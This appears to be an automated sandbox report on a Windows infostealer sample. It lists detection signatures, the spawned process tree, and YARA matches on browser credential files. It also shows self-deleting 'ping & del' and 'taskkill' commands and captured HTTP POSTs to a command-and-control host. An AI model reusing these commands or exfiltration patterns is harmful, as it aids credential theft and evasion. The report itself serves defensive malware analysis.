Play interactive tour

Edit tour

Analysis Report N1yprTBBXs.exe

Overview

General Information

Sample Name:	N1yprTBBXs.exe
Analysis ID:	346123
MD5:	f7d7c89f3f5cbc925480b46b7b934157
SHA1:	73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256:	2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Startup

System is w10x64

N1yprTBBXs.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F7D7C89F3F5CBC925480B46B7B934157)

msiexec.exe (PID: 6548 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

6272167835D47591.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)

1611970727133.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 6096 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 3656 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

6272167835D47591.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)

cmd.exe (PID: 7012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 7132 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 7100 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5112 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 6716 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6848 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6640 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.N1yprTBBXs.exe.2750000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.N1yprTBBXs.exe.2750000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.2880000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.2730000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.2880000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.N1yprTBBXs.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.2730000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.3350000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
4.2.6272167835D47591.exe.32e0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Metadefender: Detection: 18%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	ReversingLabs: Detection: 59%

Multi AV Scanner detection for submitted file

Show sources

Source: N1yprTBBXs.exe	Virustotal: Detection: 38%	Perma Link
Source: N1yprTBBXs.exe	Metadefender: Detection: 18%	Perma Link
Source: N1yprTBBXs.exe	ReversingLabs: Detection: 59%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: N1yprTBBXs.exe

Joe Sandbox ML: detected

Cryptography:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004C24B0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,	0_2_004C24B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00463680 _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,	0_2_00463680
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey,	0_2_00456840
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045C870 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,	0_2_0045C870
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,	2_2_1001F720

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Unpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack

Uses 32bit PE files

Show sources

Source: N1yprTBBXs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: N1yprTBBXs.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr

Spreading:

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,	0_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,	0_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,	2_2_1001A170

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: global traffic

HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*

Source: global traffic	HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
